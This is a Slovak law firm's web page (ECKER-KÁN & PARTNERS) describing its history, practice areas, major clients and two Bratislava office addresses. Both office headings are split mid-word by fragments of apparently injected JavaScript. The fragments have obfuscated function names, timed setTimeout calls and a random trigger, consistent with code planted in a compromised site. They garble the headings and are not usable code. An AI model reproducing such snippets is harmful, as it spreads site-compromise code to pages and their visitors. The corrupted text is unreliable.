TRADÍCIA

 • Už viac ako 25 rokov našim klientom ponúkame právne služby najvyššej kvality vo všetkých právnych oblastiach.
 • Advokátsku kanceláriu ECKER-KÁN & PARTNERS založil v roku 1991 JUDr. Vladimír Kán s partnermi z prostredia justície.

STABILITA

 • Od svojho založenia sa advokátska kancelária ECKER-KÁN & PARTNERS vyprofilovala na najväčšiu slovenskú advokátsku kanceláriu.
 • Advokátskej kancelárii ECKER-KÁN & PARTNERS prejavili počas jej dlhoročnej existencie dôveru stovky zahraničných a domácich klientov.

SKÚSENOSTI

 • Zakladatelia advokátskej kancelárie ECKER-KÁN & PARTNERS dlhoročne pôsobili ako sudcovia všeobecných súdov a na Ministerstve spravodlivosti SR.
 • Právnici advokátskej kancelárie ECKER-KÁN & PARTNERS nadobudli neopakovateľné skúsenosti pri riešení právnych prípadov patriacich k najvýznamnejším v histórii samostatnosti Slovenskej republiky.

ZAMERANIE 

Advokátska kancelária ECKER-KÁN & PARTNERS sa osobitne zameriava na:

 • Poskytovanie komplexného právneho poradenstva súvisiaceho s každodennou podnikateľskou alebo inou činnosťou klientov a zastupovanie pri vymáhaní pohľadávok.
 • Zastupovanie klientov v zložitých a závažných súdnych sporoch.
 • Konkurzy, reštrukturalizácie a krízové riadenie podnikov prostredníctvom sesterskej spoločnosti BANKRUPTCY & RECOVERY SERVICE.

KLIENTI

Medzi našich klientov patria najvýznamnejšie mená z rôznych oblastí trhu. Spomedzi stoviek klientov napríklad aj:

 • BTS Airport Bratislava
 • Cofely – GDF Suez
 • ČSOB
 • DPD
 • Eximbanka SR
 • Fond národného majetku
 • IBM
 • Legrand
 • Mercedes-Benz
 • Ministerstvo životného prostredia SR
 • Nestle
 • OMV
 • PPF
 • RTVS
 • Sberbank
 • Slovak Telekom
 • Slovenská pošta
 • Slovenská sporiteľňa
 • Slovenská záručná a rozvojová banka
 • Slovenský pozemkový fond
 • SPP
 • Tatra banka
 • Transpetrol
 • UniCredit

Kancelária Bratislava - Staré Mesdelay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to

Address for correspondence:
ECKER - KÁN & partners
Nám. M. Benku 9/C1
811 07 Bratislava

Tel.:
+421 (2) 5020 2911

Fax:
+421 (2) 5020 2914

Email:
v.kan@ecker-kan.sk

Kancelária Bratislava - Hisdelay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}torické centrum

Adresa:
Advokátska kancelária ECKER - KÁN & PARTNERS, s.r.o.
Zelená 2
811 01 Bratislava
Slovenská republika


Tel.:
+421 (2) 5020 2911

Fax:
+421 (2) 5020 2914

Email:
v.kan@ecker-kan.sk